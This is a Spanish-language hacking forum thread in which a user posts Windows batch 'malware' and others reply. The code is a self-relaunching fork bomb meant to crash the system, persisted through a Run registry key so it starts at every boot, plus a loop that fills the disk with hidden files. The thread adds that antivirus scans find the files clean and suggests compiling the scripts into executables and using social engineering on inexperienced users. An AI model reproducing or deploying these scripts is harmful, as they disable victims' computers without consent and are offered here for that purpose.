Malware sencillo

Iniciado por rollth, Enero 07, 2015, 07:41:11 AM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Enero 07, 2015, 07:41:11 AM Ultima modificación: Enero 20, 2015, 08:08:46 PM por rollth
Buenas a todos os traigo un malware sencillo hecho en batch.

Archivo won.bat:

Código: dos

@echo off
:va
start won.bat
goto va
exit


Esto lo que hace es abrir muchas veces ese mismo archivo (que a su vez abriria otra vez el mismo archivo) hasta que colapse el sistema, el problema que esto asi esta muy feo, entonces se crea este otro archivo.

Archivo registro.bat:

Código: dos

@echo off
set lugar=%CD%\won.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
start won.bat
exit


Este segundo archivo modifica el registro para que cuando se abra windows se abra el archivo directamente, y despues se abre el archivo (por si lo borra)

PD: Si abre desde modo seguro no se abrira el archivo.
PD2: Según vt los dos archivos están limpios.

EDITO

Hay una tercera opción, seria hacerlo todo en un solo archivo.

Archivo won.bat:

Código: dos

@echo off
set lugar=%CD%\won.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%" /f
:va
start won.bat
goto va
exit


EDITO 2

Otra forma de  hacerlo en un solo archivo

Código: dos

@echo off
set lugar=%CD%\won.bat
set lugar1=%CD%\hola.txt
if exist %lugar1% (goto va) else (goto install)
:install
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
echo hola > hola.txt
:va
start "won.bat"
goto va
exit


EDITO 3

Otro codigo que lo que hace es ir llenandonos poco a poco la memoria del disco duro.

Código: dos
@echo off
:bucle
set N=%random%%random%%random%.txt
echo  >> %N%
attrib +r +s +h %N%.txt
goto bucle


Código: dos
@echo off
:bucle
set N = 0
start a.bat
set N = %N%+1
if %N% == 50 (goto exit) else goto bucle
:exit
exit


Código: dos
@echo off
move a.abt C:\
move b.abt C:\
cd C:\
set lugar=%CD%\b.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
start b.bat
exit
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

yo una vez hice uno así, pero le agregue lo siguiente

Código: dos

@echo off
:va
msg * <algún mensaje>
start won.bat
goto va
exit


así salta el mensaje por cada vez que se abre , una tontera la verdad jaja


Saludos bro!

Nivel 77 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vamos, eso no es malware, es un script molesto nada mas.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos, eso no es malware, es un script molesto nada mas.

Hombre  el malware es software que produce daños sin consentimiento del usuario, si en en lugar de bat lo compilas en un .exe (libreria <stdlib.h> en c y la funcion system("")) con un poco de ingenieria social puede llegar a ser muy molesto para un usuario de bajos conocimientos.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta